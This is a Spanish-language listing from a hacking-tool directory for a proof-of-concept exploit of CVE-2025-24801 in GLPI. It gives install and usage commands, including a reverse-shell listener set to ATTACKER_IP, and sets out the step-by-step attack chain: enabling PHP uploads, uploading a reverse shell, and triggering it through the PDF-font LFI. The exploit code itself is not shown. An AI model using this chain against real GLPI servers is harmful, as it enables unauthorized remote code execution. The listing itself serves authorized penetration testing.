Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24801 — CVE-2025-24801 Exploit | Kitploit
Herramientas/GitHubGitHub/fatkz/cve-2025-24801
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubfatkz/cve-2025-24801

CVE-2025-24801

CVE-2025-24801 Exploit

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24801 PoC para RCE en GLPI

Este repositorio contiene un script de prueba de concepto (poc.py) que explota CVE-2025-24801, una vulnerabilidad LFI a RCE en GLPI 10.0.17. Automatiza:

  • Iniciar sesión en GLPI
  • Habilitar la carga de archivos .php actualizando la configuración del tipo de documento
  • Subir un shell reverso PHP a través del endpoint de carga de archivos AJAX

🛠️ Instalación

root@kitploit:~
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 Uso

root@kitploit:~
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: URL base de la instancia de GLPI (ej. https://example.com/glpi)
  • --user / --password: Credenciales válidas de un técnico de GLPI
  • --lhost / --lport: IP y puerto del atacante para el listener del shell reverso

El script utiliza automáticamente --doc-id 1 por defecto para actualizar el primer tipo de documento.

Después de la ejecución, el script:

  1. Iniciará sesión y establecerá una sesión
  2. Habilitará la carga de archivos .php actualizando el tipo de documento ID 1
  3. Subirá exploit.php que contiene un payload de shell reverso PHP

Luego deberás activar manualmente el LFI especificando el nombre del archivo subido en el include de fuente PDF (por ejemplo, mediante la función de exportación de informes) para lograr RCE.

📑 Cómo funciona

  1. Inicio de sesión: Extrae el token CSRF de /front/login.php y envía las credenciales para autenticarse.
  2. Habilitar carga de PHP: Obtiene /front/documenttype.form.php?id=1, analiza el token CSRF y añade php a las extensiones permitidas.
  3. Subir shell: Obtiene /front/ticket.form.php para un token CSRF, luego usa /ajax/fileupload.php (con X-Requested-With: XMLHttpRequest) para subir un shell reverso PHP.
  4. Activar RCE: Invoca manualmente el LFI de fuente PDF especificando el nombre del archivo shell subido en el parámetro pdffont durante la exportación de informes.

⚠️ Aviso legal

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. No la uses contra sistemas sin permiso explícito.


Creado con fines educativos y de pruebas de penetración autorizadas.

Descargar herramienta